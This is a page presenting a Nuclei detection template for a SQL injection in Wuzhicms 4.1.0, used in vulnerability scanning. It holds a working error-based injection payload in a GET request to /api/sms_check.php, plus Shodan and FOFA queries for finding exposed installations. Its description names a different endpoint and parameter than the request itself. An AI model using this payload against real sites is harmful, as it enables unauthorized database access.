Skip to content

Wuzhicms 4.1.0 - SQL Injection

ID: wuzhicms-sqli

Severity: critical

Author: princechaddha

Tags: wuzhicms,sqli

Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

id: wuzhicms-sqli
info:
name: Wuzhicms 4.1.0 - SQL Injection
author: princechaddha
severity: critical
description: |
Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/wuzhicms/wuzhicms/issues/184
- https://vulners.com/cnvd/CNVD-2022-36985
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
cpe: cpe:2.3:a:wuzhicms:wuzhicms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Wuzhicms"
fofa-query: title="Wuzhicms"
product: wuzhicms
vendor: wuzhicms
tags: wuzhicms,sqli
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'
- type: status
status:
- 200
# digest: 4a0a0047304502203a43cd2128f270406c91eabf96778c6bfc5a6fd8467b8ebf122703edc7184888022100f8ff19f1c933bbb2868adae00e9f300e07d36772cc64a8e0b4776b82cd8ffe19:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/wuzhicms-sqli.yaml"

View on Github